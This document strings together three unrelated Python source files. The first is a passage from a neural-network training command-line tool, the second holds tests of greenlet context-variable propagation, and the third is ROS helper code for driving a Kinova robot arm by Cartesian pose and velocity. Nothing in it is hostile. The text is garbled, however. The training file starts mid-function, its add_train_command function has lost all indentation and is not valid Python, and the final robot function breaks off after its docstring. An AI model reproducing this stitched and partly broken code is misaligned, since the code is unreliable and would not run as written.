    last_epoch = 0
    if args.resume:
        last_epoch = _get_current_parameter(args)
        logger.log(99, "Resume from epoch {}".format(last_epoch + 1))

    max_iteration = config.training_config.max_epoch * \
        config.training_config.iter_per_epoch

    if single_or_rankzero():
        logger.log(99, 'Training epoch {} of {} begin'.format(last_epoch + 1,
                                                              config.training_config.max_epoch))

    # Lightweight mutable record for loss accumulation across iterations.
    class Cost:
        pass
    cost = Cost()
    cost.sum_epoch = 0.0
    cost.num_iteration = 0
    cost.sum_iteration = 0.0
    cost.variables = None

    best_error = None

    # Mutable record for elapsed/estimated time bookkeeping.
    class TimeInfo:
        pass
    timeinfo = TimeInfo()
    timeinfo.last_past_time = None

    if max_iteration > 0:
        last_iteration = last_epoch * config.training_config.iter_per_epoch
        if last_iteration < max_iteration:
            timeinfo.start_time = time.time()

            for iteration in range(last_iteration, max_iteration):
                cost = _update(iteration, config, cost)

                if (iteration - last_iteration) > 0:
                    timeinfo = _calc_estimate_time(
                        timeinfo, max_iteration, last_iteration, iteration)
                    # Abort early when the projected total exceeds the limit.
                    if config.timelimit > 0 and timeinfo.estimate_time > config.timelimit:
                        logger.log(99, 'Expected training time ({:.3f}s) will exceed time limit ({}s).'.format(
                            timeinfo.estimate_time, config.timelimit))
                        return False

                if (iteration + 1) % config.training_config.iter_per_epoch == 0:
                    # NOTE(review): last_past_time is assigned but never read
                    # here — looks like dead code; confirm before removing.
                    last_past_time = -1
                    # End of epoch
                    epoch = iteration // config.training_config.iter_per_epoch + 1
                    cost_avg_epoch = cost.sum_epoch / cost.num_iteration
                    cost.sum_epoch = 0.0
                    cost.num_iteration = 0

                    monitoring_report = []

                    # Evaluation (every monitor_interval epochs, and always
                    # during the first five epochs).
                    error_str = ''
                    if epoch % config.training_config.monitor_interval == 0 or epoch <= 5:
                        best_error, error_str = _evaluate(
                            args, config, monitoring_report, best_error, epoch)

                    if single_or_rankzero():
                        # Write to monitoring_report.yml
                        f = open(os.path.join(
                            args.outdir, 'monitoring_report.yml'), 'a')
                        f.write('{}:\n'.format(epoch - 1))
                        f.write(' cost: {}\n'.format(cost_avg_epoch))
                        for s in monitoring_report:
                            f.write(s)
                        f.close()

                        _save_parameters(args, 'current', epoch)

                        logger.log(99, 'epoch {} of {} cost={:.6f} {} time=({:.1f}s /{:.1f}s)'.format(
                            epoch, config.training_config.max_epoch, cost_avg_epoch, error_str,
                            timeinfo.past_time, timeinfo.estimate_time))

    if single_or_rankzero():
        # NOTE(review): `epoch` is only bound inside the loop above; if
        # max_iteration <= 0 or training was already complete this raises
        # NameError — confirm callers always enter the loop.
        _save_parameters(args, 'current', epoch, True)
    return True
def train_command(args):
    """CLI entry point for the 'train' subcommand.

    Loads the network description from ``args.config`` (and optionally
    initial parameters from ``args.param``), builds optimizer/monitor
    configs, opens the data iterators, and runs ``_train``. With
    max_iteration == 0 it only saves the initial parameters.

    Note: always returns True; the train result is only logged.
    """
    if single_or_rankzero():
        configure_progress(os.path.join(args.outdir, 'progress.txt'))

    info = load.load([args.config], exclude_parameter=True)

    # Check dataset uri is empty.
    dataset_error = False
    for dataset in info.datasets.values():
        if dataset.uri.strip() == '':
            dataset_error = True
    if dataset_error:
        logger.log(99, 'Fatal error. Dataset URI is empty.')
        return False

    class TrainConfig:
        pass
    config = TrainConfig()
    config.timelimit = -1
    if args.param:
        load.load([args.param], parameter_only=True)

    config.global_config = info.global_config
    config.training_config = info.training_config

    if single_or_rankzero():
        logger.log(99, 'Train with contexts {}'.format(available_contexts))

    class OptConfig:
        pass
    config.optimizers = OrderedDict()
    for name, opt in info.optimizers.items():
        o = OptConfig()
        o.optimizer = opt
        o.data_iterator = None
        config.optimizers[name] = o

    class MonConfig:
        pass
    config.monitors = OrderedDict()
    for name, mon in info.monitors.items():
        m = MonConfig()
        m.monitor = mon
        m.data_iterator = None
        config.monitors[name] = m

    # Training: split the iterations per epoch evenly across ranks.
    comm = current_communicator()
    config.training_config.iter_per_epoch //= comm.size if comm else 1
    max_iteration = config.training_config.max_epoch * \
        config.training_config.iter_per_epoch

    # Remember where the network description lives so _save_parameters can
    # bundle it into each .nnp snapshot.
    global _save_parameter_info
    _save_parameter_info = {}
    _, config_ext = os.path.splitext(args.config)
    if config_ext == '.prototxt' or config_ext == '.nntxt':
        _save_parameter_info['config'] = args.config
    elif config_ext == '.nnp':
        with zipfile.ZipFile(args.config, 'r') as nnp:
            for name in nnp.namelist():
                _, ext = os.path.splitext(name)
                if ext == '.nntxt' or ext == '.prototxt':
                    nnp.extract(name, args.outdir)
                    _save_parameter_info['config'] = os.path.join(
                        args.outdir, name)

    result = False
    if max_iteration > 0:
        # NOTE(review): data_iterators is never used afterwards — dead code?
        data_iterators = {'optimizer': {}, 'monitor': {}}
        # Per-rank RNG so each rank draws a distinct data slice.
        rng = np.random.RandomState(comm.rank if comm else 0)
        with ExitStack() as stack:
            for name, o in config.optimizers.items():
                o.data_iterator = stack.enter_context(
                    o.optimizer.data_iterator())
                if comm and comm.size > 1:
                    o.data_iterator = o.data_iterator.slice(
                        rng, comm.size, comm.rank)
            for name, m in config.monitors.items():
                m.data_iterator = stack.enter_context(
                    m.monitor.data_iterator())
                if comm and comm.size > 1:
                    m.data_iterator = m.data_iterator.slice(
                        rng, comm.size, comm.rank)
            result = _train(args, config)
    else:
        # save parameters without training (0 epoch learning)
        logger.log(99, '0 epoch learning. (Just save parameter.)')
        if single_or_rankzero():
            _save_parameters(args, 'current', 0, True)
        result = True

    if single_or_rankzero():
        if result:
            logger.log(99, 'Training Completed.')
        else:
            logger.log(99, 'Training Incompleted.')
    if single_or_rankzero():
        progress(None)
    return True
def add_train_command(subparsers):
# Train
subparser = subparsers.add_parser('train', help='Training with NNP.')
subparser.add_argument(
'-r', '--resume', help='resume from last saved parameter.', action='store_true')
subparser.add_argument(
'-c', '--config', help='path to nntxt', required=True)
subparser.add_argument(
'-p', '--param', help='path to parameter file', required=False)
subparser.add_argument(
'-o', '--outdir', help='output directory', required=True)
subparser.set_defaults(func=train_command)
|
test_greenlet_contextvars.py | import pytest, sys
from functools import partial
from greenlet import greenlet
from greenlet import getcurrent
from greenlet import GREENLET_USE_CONTEXT_VARS
from contextvars import Context
from contextvars import ContextVar
from contextvars import copy_context
def test_context_vars_enabled_on_py37():
    """The greenlet build must report context-variable support (Python 3.7+)."""
    flag = GREENLET_USE_CONTEXT_VARS
    assert flag is True
def test_minimal_set():
    """Each greenlet with its own copied context keeps an isolated ContextVar.

    Four greenlets get independent ``copy_context()`` snapshots taken while
    ``id_var`` is "not started"; setting the var in main or in one greenlet
    must never leak into the others.
    """
    def _increment(greenlet_id, ctx_var, callback):
        # Runs inside a greenlet whose gr_context was copied before main
        # changed the var, so it still sees the snapshot value.
        assert ctx_var.get() == "not started"
        ctx_var.set(greenlet_id)
        for _ in range(2):
            # Yield back to main; our context value must survive switches.
            callback()
        assert id_var.get() == greenlet_id
        assert getcurrent().gr_context[id_var] == greenlet_id

    id_var = ContextVar("id", default=None)
    id_var.set("not started")

    callback = getcurrent().switch
    lets = [
        greenlet(partial(
            _increment,
            greenlet_id=i,
            ctx_var=id_var,
            callback=callback,
        ))
        for i in range(1, 5)
    ]
    for let in lets:
        let.gr_context = copy_context()
        assert let.gr_context[id_var] == "not started"
    # Changing the var in main must not affect the copied contexts.
    id_var.set("in main")
    for let in lets:
        assert let.gr_context[id_var] == "not started"

    # Three rounds: start (1), two callback yields (2, 3) per greenlet.
    for i in range(3):
        assert id_var.get() == "in main"
        for let in lets:
            let.switch()
    assert id_var.get() == "in main"

    for (i, let) in zip(range(1, 5), lets):
        assert let.dead
        assert let.gr_context[id_var] == i
# the rest mostly copied from CPython's greenlet
class TestContextVars:
    """Context-variable propagation tests, mostly copied from CPython's
    greenlet test-suite but adapted to run under plain pytest (the unittest
    assert* helpers are re-implemented as thin wrappers around assert)."""

    def assertEqual(self, x, y): assert x == y
    def assertIs(self, x, y): assert x is y
    def assertIsNone(self, x): assert x is None
    def assertTrue(self, x): assert x
    def assertIsInstance(self, x, y): assert isinstance(x, y)

    def _new_ctx_run(self, *args, **kwargs):
        # Run the callable in a fresh copy of the current context so tests
        # do not pollute each other's context variables.
        return copy_context().run(*args, **kwargs)

    def _increment(self, greenlet_id, ctx_var, callback, counts, expect):
        # Body executed inside each test greenlet: check the inherited
        # value, set our own id, and count how often we observe it across
        # two switches back to the scheduler.
        if expect is None:
            self.assertIsNone(ctx_var.get())
        else:
            self.assertEqual(ctx_var.get(), expect)
        ctx_var.set(greenlet_id)
        for _ in range(2):
            counts[ctx_var.get()] += 1
            callback()

    def _test_context(self, propagate_by):
        # propagate_by selects how the context reaches each greenlet:
        # "run"   - wrap the body in copy_context().run
        # "set"   - assign a copied context to gr_context
        # "share" - all greenlets share the parent's context object
        # None    - no propagation at all (each greenlet starts empty)
        id_var = ContextVar("id", default=None)
        id_var.set(0)

        callback = getcurrent().switch
        counts = dict((i, 0) for i in range(5))

        lets = [
            greenlet(partial(
                partial(
                    copy_context().run,
                    self._increment
                ) if propagate_by == "run" else self._increment,
                greenlet_id=i,
                ctx_var=id_var,
                callback=callback,
                counts=counts,
                expect=(
                    i - 1 if propagate_by == "share" else
                    0 if propagate_by in ("set", "run") else None
                )
            ))
            for i in range(1, 5)
        ]

        for let in lets:
            if propagate_by == "set":
                let.gr_context = copy_context()
            elif propagate_by == "share":
                let.gr_context = getcurrent().gr_context
            else:
                self.assertIsNone(let.gr_context)

        for i in range(2):
            counts[id_var.get()] += 1
            for let in lets:
                let.switch()

        if propagate_by == "run":
            # Must leave each context.run() in reverse order of entry
            for let in reversed(lets):
                let.switch()
        else:
            # No context.run(), so fine to exit in any order.
            for let in lets:
                let.switch()

        for let in lets:
            self.assertTrue(let.dead)
            # When using run(), we leave the run() as the greenlet dies,
            # and there's no context "underneath". When not using run(),
            # gr_context still reflects the context the greenlet was
            # running in.
            self.assertEqual(let.gr_context is None, propagate_by == "run")

        if propagate_by == "share":
            self.assertEqual(counts, {0: 1, 1: 1, 2: 1, 3: 1, 4: 6})
        else:
            self.assertEqual(set(counts.values()), set([2]))

    def test_context_propagated_by_context_run(self):
        self._new_ctx_run(self._test_context, "run")

    def test_context_propagated_by_setting_attribute(self):
        self._new_ctx_run(self._test_context, "set")

    def test_context_not_propagated(self):
        self._new_ctx_run(self._test_context, None)

    def test_context_shared(self):
        self._new_ctx_run(self._test_context, "share")

    def test_break_ctxvars(self):
        """Entering a context in one greenlet and exiting it in another is
        an interpreter-level error; this documents the failure mode."""
        let1 = greenlet(copy_context().run)
        let2 = greenlet(copy_context().run)

        let1.switch(getcurrent().switch)
        let2.switch(getcurrent().switch)

        # Since let2 entered the current context and let1 exits its own, the
        # interpreter emits:
        # RuntimeError: cannot exit context: thread state references a different context object
        let1.switch()

    def test_not_broken_if_using_attribute_instead_of_context_run(self):
        # The same switching pattern is safe when contexts are attached via
        # gr_context instead of nesting context.run() calls.
        let1 = greenlet(getcurrent().switch)
        let2 = greenlet(getcurrent().switch)
        let1.gr_context = copy_context()
        let2.gr_context = copy_context()

        let1.switch()
        let2.switch()

        let1.switch()
        let2.switch()

    def test_context_assignment_while_running(self):
        """gr_context can be read/assigned both from inside the running
        greenlet and from the parent while it is suspended."""
        id_var = ContextVar("id", default=None)

        def target():
            self.assertIsNone(id_var.get())
            self.assertIsNone(gr.gr_context)

            # Context is created on first use
            id_var.set(1)
            self.assertIsInstance(gr.gr_context, Context)
            self.assertEqual(id_var.get(), 1)
            self.assertEqual(gr.gr_context[id_var], 1)

            # Clearing the context makes it get re-created as another
            # empty context when next used
            old_context = gr.gr_context
            gr.gr_context = None  # assign None while running
            self.assertIsNone(id_var.get())
            self.assertIsNone(gr.gr_context)
            id_var.set(2)
            self.assertIsInstance(gr.gr_context, Context)
            self.assertEqual(id_var.get(), 2)
            self.assertEqual(gr.gr_context[id_var], 2)

            new_context = gr.gr_context
            getcurrent().parent.switch((old_context, new_context))
            # parent switches us back to old_context

            self.assertEqual(id_var.get(), 1)
            gr.gr_context = new_context  # assign non-None while running
            self.assertEqual(id_var.get(), 2)

            getcurrent().parent.switch()
            # parent switches us back to no context

            self.assertIsNone(id_var.get())
            self.assertIsNone(gr.gr_context)
            gr.gr_context = old_context
            self.assertEqual(id_var.get(), 1)

            getcurrent().parent.switch()
            # parent switches us back to no context

            self.assertIsNone(id_var.get())
            self.assertIsNone(gr.gr_context)

        gr = greenlet(target)

        with pytest.raises(AttributeError) as e:
            del gr.gr_context
        assert "can't delete attr" in str(e.value)

        self.assertIsNone(gr.gr_context)
        old_context, new_context = gr.switch()
        self.assertIs(new_context, gr.gr_context)
        self.assertEqual(old_context[id_var], 1)
        self.assertEqual(new_context[id_var], 2)
        self.assertEqual(new_context.run(id_var.get), 2)

        gr.gr_context = old_context  # assign non-None while suspended
        gr.switch()
        self.assertIs(gr.gr_context, new_context)

        gr.gr_context = None  # assign None while suspended
        gr.switch()
        self.assertIs(gr.gr_context, old_context)

        gr.gr_context = None
        gr.switch()
        self.assertIsNone(gr.gr_context)

        # Make sure there are no reference leaks (CPython only)
        #gr = None
        #gc.collect()
        #self.assertEqual(sys.getrefcount(old_context), 2)
        #self.assertEqual(sys.getrefcount(new_context), 2)

    def test_context_assignment_different_thread(self):
        """gr_context access from another thread: forbidden while running,
        allowed while suspended and after death."""
        import threading

        ctx = Context()
        var = ContextVar("var", default=None)
        is_running = threading.Event()
        should_suspend = threading.Event()
        did_suspend = threading.Event()
        should_exit = threading.Event()
        holder = []

        def greenlet_in_thread_fn():
            var.set(1)
            is_running.set()
            should_suspend.wait()
            var.set(2)
            getcurrent().parent.switch()
            holder.append(var.get())

        def thread_fn():
            gr = greenlet(greenlet_in_thread_fn)
            gr.gr_context = ctx
            holder.append(gr)
            gr.switch()
            did_suspend.set()
            should_exit.wait()
            gr.switch()

        thread = threading.Thread(target=thread_fn, daemon=True)
        thread.start()
        is_running.wait()
        gr = holder[0]

        # Can't access or modify context if the greenlet is running
        # in a different thread. Don't check that on top of PyPy though,
        # because it's not implemented (open to race conditions when we
        # implement it at pure Python, which could be fixed by adding
        # locking everywhere, which is totally not worth it IMHO).
        if sys.implementation.name == 'cpython':
            with pytest.raises(ValueError) as e:
                getattr(gr, 'gr_context')
            assert "running in a different" in str(e.value)
            with pytest.raises(ValueError) as e:
                gr.gr_context = None
            assert "running in a different" in str(e.value)

        should_suspend.set()
        did_suspend.wait()

        # OK to access and modify context if greenlet is suspended
        self.assertIs(gr.gr_context, ctx)
        self.assertEqual(gr.gr_context[var], 2)
        gr.gr_context = None

        should_exit.set()
        thread.join()

        self.assertEqual(holder, [gr, None])

        # Context can still be accessed/modified when greenlet is dead:
        self.assertIsNone(gr.gr_context)
        gr.gr_context = ctx
        self.assertIs(gr.gr_context, ctx)
|
rl_movement_utils.py | #! /usr/bin/env python
"""A helper program to test cartesian goals for the JACO and MICO arms."""
import copy
from turtle import rt
import roslib
import rospy
import sys
import numpy as np
import threading, time
import actionlib
import kinova_msgs.msg
from rospy.client import wait_for_message
import std_msgs.msg
import geometry_msgs.msg
from geometry_msgs.msg import PoseStamped
import moveit_msgs.srv
from tf.transformations import euler_from_quaternion
import math
import argparse
from kinova_msgs.srv import AddPoseToCartesianTrajectory, ClearTrajectories
""" Global variable """
arm_joint_number = 0
finger_number = 0
prefix = 'NO_ROBOT_TYPE_DEFINED_'
finger_maxDist = 18.9/2/1000 # max distance for one finger
finger_maxTurn = 6800 # max thread rotation for one finger
currentCartesianCommand = [0.212322831154, -0.257197618484, 0.509646713734, 1.63771402836, 1.11316478252, 0.134094119072] # default home in unit mq
def cartesian_pose_client(position, orientation, rad_pose, collision_check=False, wait_for_action=False):
    # If wait_for_action is True the robot performs the action to completion,
    # then stops; otherwise the pose is appended to the driver's buffer of
    # queued trajectory actions.
    """Send a cartesian goal to the action server.

    position: [x, y, z] in meters; orientation: quaternion [qx, qy, qz, qw];
    rad_pose: the same pose as [x, y, z, rx, ry, rz] Euler radians, used for
    the trajectory-buffer service. Returns the action result, an IK error
    code (-31 no solution, -12 collision), or None on timeout/queued send.
    """
    action_address = '/' + prefix + 'driver/pose_action/tool_pose'
    client = actionlib.SimpleActionClient(action_address, kinova_msgs.msg.ArmPoseAction)
    client.wait_for_server()
    rospy.wait_for_service('/j2s7s300_driver/in/add_pose_to_Cartesian_trajectory')
    cartesian_serv = rospy.ServiceProxy('/j2s7s300_driver/in/add_pose_to_Cartesian_trajectory', AddPoseToCartesianTrajectory)
    rospy.wait_for_service('/j2s7s300_driver/in/clear_trajectories')
    cartesian_clear = rospy.ServiceProxy('/j2s7s300_driver/in/clear_trajectories', ClearTrajectories)

    goal = kinova_msgs.msg.ArmPoseGoal()
    goal.pose.header = std_msgs.msg.Header(frame_id=(prefix + 'link_base'))
    goal.pose.pose.position = geometry_msgs.msg.Point(
        x=position[0], y=position[1], z=position[2])
    goal.pose.pose.orientation = geometry_msgs.msg.Quaternion(
        x=orientation[0], y=orientation[1], z=orientation[2], w=orientation[3])
    euler_angle = [orientation[0],orientation[1],orientation[2],orientation[3]]
    #goal_list = [position[0],position[1], position[2], euler_angle[0], euler_angle[1],euler_angle[2]]
    # The buffered-trajectory service takes the Euler-radian form directly.
    goal_list = rad_pose
    #print(euler_angle, "AAAAAA")
    # print('goal.pose in client 1: {}'.format(goal.pose.pose)) # debug
    if collision_check:
        # Ask MoveIt's IK service whether the goal is reachable and
        # collision-free before sending anything to the arm.
        rospy.wait_for_service('compute_ik')
        compute_ik = rospy.ServiceProxy('compute_ik', moveit_msgs.srv.GetPositionIK)
        goal_stamped = geometry_msgs.msg.PoseStamped()
        goal_stamped.header = goal.pose.header
        goal_stamped.pose = goal.pose.pose
        # NOTE(review): moveit_msgs.msg is reached through the
        # moveit_msgs.srv import above — confirm the submodule is loaded.
        msgs_request = moveit_msgs.msg.PositionIKRequest()
        msgs_request.group_name = "arm"
        msgs_request.pose_stamped = goal_stamped
        msgs_request.robot_state.is_diff = True
        msgs_request.timeout.secs = 2
        msgs_request.avoid_collisions = True
        msgs_request.ik_link_names = ["j2s7s300_joint_1", "j2s7s300_joint_2", "j2s7s300_joint_3", "j2s7s300_joint_4",
                                      "j2s7s300_joint_5", "j2s7s300_joint_6", "j2s7s300_joint_7"]
        # msgs_request.robot_state = self.robot.get_current_state()
        try:
            jointAngle=compute_ik(msgs_request)
            ans=list(jointAngle.solution.joint_state.position)[2:9]
            # NOTE(review): simplify_joints is not defined in this file —
            # presumably provided elsewhere in the package; verify.
            ans = simplify_joints(ans)
            if jointAngle.error_code.val == -31:
                print('No IK solution')
                return -31
            if (jointAngle.error_code.val == -12 or jointAngle.error_code.val==-10):
                print("Goal or current position is in collision")
                return -12
        except rospy.ServiceException as e:
            print("Service call failed: %s"%e)
    #cartesian_serv(0.144489221573,-0.462273001671, 0.40168389678,1.6176496614678213, -0.20928853117355628, 1.111220579362625)
    if wait_for_action:
        client.send_goal(goal)
        if client.wait_for_result(rospy.Duration(2.0)):
            return client.get_result()
        else:
            client.cancel_all_goals()
            print(' the cartesian action timed-out')
            return None
    else:
        # Fire-and-forget: queue the pose on the driver's trajectory buffer.
        try:
            cartesian_serv(goal_list[0], goal_list[1], goal_list[2],goal_list[3],goal_list[4],goal_list[5])
            #cartesian_clear()
        except rospy.ServiceException as e:
            print("Cartesian service call failed: %s"%e)
def QuaternionNorm(Q_raw):
    """Return *Q_raw* ([qx, qy, qz, qw]) scaled to unit length."""
    qx, qy, qz, qw = Q_raw[0:4]
    norm = math.sqrt(qx * qx + qy * qy + qz * qz + qw * qw)
    return [qx / norm, qy / norm, qz / norm, qw / norm]
def Quaternion2EulerXYZ(Q_raw):
    """Convert a quaternion [qx, qy, qz, qw] to Euler XYZ angles (radians).

    The input is normalized first, so non-unit quaternions are accepted.
    """
    qx, qy, qz, qw = QuaternionNorm(Q_raw)
    roll = math.atan2((2 * qw * qx - 2 * qy * qz),
                      (qw * qw - qx * qx - qy * qy + qz * qz))
    pitch = math.asin(2 * qw * qy + 2 * qx * qz)
    yaw = math.atan2((2 * qw * qz - 2 * qx * qy),
                     (qw * qw + qx * qx - qy * qy - qz * qz))
    return [roll, pitch, yaw]
def EulerXYZ2Quaternion(EulerXYZ_):
    """Convert Euler XYZ angles (radians) to a quaternion [qx, qy, qz, qw]."""
    tx, ty, tz = EulerXYZ_[0:3]
    sx, cx = math.sin(0.5 * tx), math.cos(0.5 * tx)
    sy, cy = math.sin(0.5 * ty), math.cos(0.5 * ty)
    sz, cz = math.sin(0.5 * tz), math.cos(0.5 * tz)
    return [
        sx * cy * cz + cx * sy * sz,
        cx * sy * cz - sx * cy * sz,
        sx * sy * cz + cx * cy * sz,
        cx * cy * cz - sx * sy * sz,
    ]
def getcurrentCartesianCommand(prefix_):
    """Block until the driver publishes the arm's current Cartesian pose.

    Subscribes setcurrentCartesianCommand() to the driver's
    cartesian_command topic (which updates the currentCartesianCommand
    global) and waits for at least one message to arrive.
    """
    # wait to get current position
    topic_address = '/' + prefix_ + 'driver/out/cartesian_command'
    rospy.Subscriber(topic_address, kinova_msgs.msg.KinovaPose, setcurrentCartesianCommand)
    #print(prefix)
    rospy.wait_for_message(topic_address, kinova_msgs.msg.KinovaPose)
    #print 'position listener obtained message for Cartesian pose. '
def setcurrentCartesianCommand(feedback):
    """Subscriber callback: refresh the currentCartesianCommand global.

    Parses the str() representation of the KinovaPose message line by line
    ("Field: value") instead of reading its attributes directly.
    NOTE(review): this assumes str(feedback) yields exactly one line per
    element of currentCartesianCommand (6 fields) — extra lines would raise
    IndexError; confirm against the KinovaPose message definition.
    """
    global currentCartesianCommand

    currentCartesianCommand_str_list = str(feedback).split("\n")

    for index in range(0,len(currentCartesianCommand_str_list)):
        temp_str=currentCartesianCommand_str_list[index].split(": ")
        currentCartesianCommand[index] = float(temp_str[1])
    # the following directly reading only read once and didn't update the value.
    # currentCartesianCommand = [feedback.X, feedback.Y, feedback.Z, feedback.ThetaX, feedback.ThetaY, feedback.Z]
    # print 'currentCartesianCommand in setcurrentCartesianCommand is: ', currentCartesianCommand
def argumentParser(argument_):
    """Parse the command-line arguments for a Cartesian pose command.

    Accepts the robot type code, an optional unit ('mq', 'mdeg' or 'mrad'),
    the pose values, and the -r/-v flags. Returns the parsed namespace.
    """
    cli = argparse.ArgumentParser(description='Drive robot end-effector to command Cartesian pose')
    cli.add_argument('kinova_robotType', metavar='kinova_robotType', type=str, default='j2n6a300',
                     help='kinova_RobotType is in format of: [{j|m|r|c}{1|2}{s|n}{4|6|7}{s|a}{2|3}{0}{0}]. eg: j2n6a300 refers to jaco v2 6DOF assistive 3fingers. Please be noted that not all options are valided for different robot types.')
    cli.add_argument('unit', metavar='unit', type=str, nargs='?', default='mq',
                     choices={'mq', 'mdeg', 'mrad'},
                     help='Unit of Cartesian pose command, in mq(Position meter, Orientation Quaternion), mdeg(Position meter, Orientation Euler-XYZ in degree), mrad(Position meter, Orientation Euler-XYZ in radian)]')
    cli.add_argument('pose_value', nargs='*', type=float, help='Cartesian pose values: first three values for position, and last three(unit mdeg or mrad)/four(unit mq) for Orientation')
    cli.add_argument('-r', '--relative', action='store_true',
                     help='the input values are relative values to current position.')
    cli.add_argument('-v', '--verbose', action='store_true',
                     help='display Cartesian pose values in alternative convention(mq, mdeg or mrad)')
    # parser.add_argument('-f', action='store_true', help='assign finger values from a file')
    return cli.parse_args(argument_)
def kinova_robotTypeParser(kinova_robotType_):
    """Decode a robot-type code (e.g. 'j2s7s300') into module-level globals.

    Character positions: category, category version, wrist type, arm joint
    count, robot mode, finger count. Also derives the topic/frame prefix and
    resets the per-finger limits.
    """
    global robot_category, robot_category_version, wrist_type, arm_joint_number, robot_mode, finger_number, prefix, finger_maxDist, finger_maxTurn
    code = kinova_robotType_
    robot_category = code[0]
    robot_category_version = int(code[1])
    wrist_type = code[2]
    arm_joint_number = int(code[3])
    robot_mode = code[4]
    finger_number = int(code[5])
    prefix = code + "_"
    finger_maxDist = 18.9/2/1000  # max distance for one finger in meter
    finger_maxTurn = 6800  # max thread turn for one finger
def unitParser(unit_, pose_value_, relative_):
    """ Argument unit

    Convert a pose given in *unit_* ('mq', 'mdeg' or 'mrad') into all three
    conventions. When *relative_* is true the input is treated as an offset
    from the arm's current pose, read from the currentCartesianCommand
    global (kept current by the ROS subscriber callback), with orientation
    offsets composed in Euler-XYZ space.

    Returns (pose_mq, pose_mdeg, pose_mrad).
    """
    global currentCartesianCommand

    position_ = pose_value_[:3]
    orientation_ = pose_value_[3:]

    for i in range(0,3):
        if relative_:
            position_[i] = pose_value_[i] + currentCartesianCommand[i]
        else:
            position_[i] = pose_value_[i]

    # print('pose_value_ in unitParser 1: {}'.format(pose_value_))  # debug

    if unit_ == 'mq':
        if relative_:
            # Compose the quaternion offset with the current pose in
            # Euler space, then convert back.
            orientation_XYZ = Quaternion2EulerXYZ(orientation_)
            orientation_xyz_list = [orientation_XYZ[i] + currentCartesianCommand[3+i] for i in range(0,3)]
            orientation_q = EulerXYZ2Quaternion(orientation_xyz_list)
        else:
            orientation_q = orientation_
        orientation_rad = Quaternion2EulerXYZ(orientation_q)
        orientation_deg = list(map(math.degrees, orientation_rad))
    elif unit_ == 'mdeg':
        if relative_:
            orientation_deg_list = list(map(math.degrees, currentCartesianCommand[3:]))
            orientation_deg = [orientation_[i] + orientation_deg_list[i] for i in range(0,3)]
        else:
            orientation_deg = orientation_
        orientation_rad = list(map(math.radians, orientation_deg))
        orientation_q = EulerXYZ2Quaternion(orientation_rad)
    elif unit_ == 'mrad':
        if relative_:
            orientation_rad_list = currentCartesianCommand[3:]
            orientation_rad = [orientation_[i] + orientation_rad_list[i] for i in range(0,3)]
        else:
            orientation_rad = orientation_
        orientation_deg = list(map(math.degrees, orientation_rad))
        orientation_q = EulerXYZ2Quaternion(orientation_rad)
    else:
        raise Exception("Cartesian value have to be in unit: mq, mdeg or mrad")

    pose_mq_ = position_ + orientation_q
    pose_mdeg_ = position_ + orientation_deg
    pose_mrad_ = position_ + orientation_rad

    # print('pose_mq in unitParser 1: {}'.format(pose_mq_))  # debug

    return pose_mq_, pose_mdeg_, pose_mrad_
def verboseParser(verbose, pose_mq_):
    """ Argument verbose """
    # Decompose a quaternion pose for optional debug output.
    # pose_mq_ is expected to be [x, y, z, qx, qy, qz, qw].
    position_ = pose_mq_[:3]
    orientation_q = pose_mq_[3:]
    if verbose:
        # Convert quaternion -> Euler-XYZ radians -> degrees.
        orientation_rad = Quaternion2EulerXYZ(orientation_q)
        orientation_deg = list(map(math.degrees, orientation_rad))
        # NOTE(review): the block below is a disabled (stringified) debug dump;
        # the conversions above are currently computed but never printed.
        """print('Cartesian position is: {}'.format(position_))
        print('Cartesian orientation in Quaternion is: ')
        print('qx {:0.3f}, qy {:0.3f}, qz {:0.3f}, qw {:0.3f}'.format(orientation_q[0], orientation_q[1], orientation_q[2], orientation_q[3]))
        print('Cartesian orientation in Euler-XYZ(radian) is: ')
        print('tx {:0.3f}, ty {:0.3f}, tz {:0.3f}'.format(orientation_rad[0], orientation_rad[1], orientation_rad[2]))
        print('Cartesian orientation in Euler-XYZ(degree) is: ')
        print('tx {:3.1f}, ty {:3.1f}, tz {:3.1f}'.format(orientation_deg[0], orientation_deg[1], orientation_deg[2]))"""
def go_to_relative(pose, collision_check=False, complete_action=True):
    """Move the arm by a relative Cartesian offset.

    Args:
        pose: 6-element relative pose [dx, dy, dz, droll, dpitch, dyaw] with
            the orientation part in degrees (parsed with unit 'mdeg').
        collision_check: forwarded to cartesian_pose_client.
        complete_action: if True, wait for the pose action to finish.

    Returns:
        The cartesian_pose_client result, or None if the request was
        interrupted before a result was obtained.
    """
    kinova_robotTypeParser("j2s7s300")
    try:
        rospy.init_node(prefix + 'pose_action_client')
    except Exception:
        # The node may already be initialized by the caller; that's fine.
        pass
    getcurrentCartesianCommand(prefix)
    pose_mq, pose_mdeg, pose_mrad = unitParser('mdeg', pose, True)
    # BUG FIX: compute `poses` before the try block so verboseParser() below
    # can never see an unbound name, and pre-set `result` so `return result`
    # is always defined even when the action is interrupted.
    poses = [float(n) for n in pose_mq]
    result = None
    try:
        result = cartesian_pose_client(poses[:3], poses[3:], rad_pose=pose_mrad,
                                       collision_check=collision_check,
                                       wait_for_action=complete_action)
    except rospy.ROSInterruptException:
        # BUG FIX: Python 2 `print` statement replaced with the function form
        # used everywhere else in this file.
        print("program interrupted before completion")
    verboseParser(True, poses)
    return result
def publishCatesianVelocityCommands(cartVel, duration_sec, prefix="j2s7s300_"):
    """Stream a constant 6-DOF Cartesian velocity to the Kinova driver.

    Publishes ``cartVel`` (linear x/y/z then angular x/y/z) on the driver's
    cartesian_velocity topic at 100 Hz for ``duration_sec`` seconds.
    """
    topic_name = '/' + prefix + 'driver/in/cartesian_velocity'
    pub = rospy.Publisher(topic_name, kinova_msgs.msg.PoseVelocity, queue_size=1)

    vel_msg = kinova_msgs.msg.PoseVelocity()
    vel_msg.twist_linear_x = cartVel[0]
    vel_msg.twist_linear_y = cartVel[1]
    vel_msg.twist_linear_z = cartVel[2]
    vel_msg.twist_angular_x = cartVel[3]
    vel_msg.twist_angular_y = cartVel[4]
    vel_msg.twist_angular_z = cartVel[5]

    # 100 Hz publish loop; total message count covers the requested duration.
    rate = rospy.Rate(100)
    published = 0
    while published < 100 * duration_sec:
        published += 1
        pub.publish(vel_msg)
        rate.sleep()
def cartesian_velocity_req(command, duration, collision_check=False, duration_timeout=None):
    """
    send cartesian velocity requests.
    command: 6d cartesian velocity command
    duration: duration of the velocity command
    collision_check: whether or not to calculate displacement and check collision
    duration_timeout: will return before duration if duration_timeout<duration
    ------
    returns: 1 if successful, -31 if no ik, -12 if in collision, -1 if general exception
    """
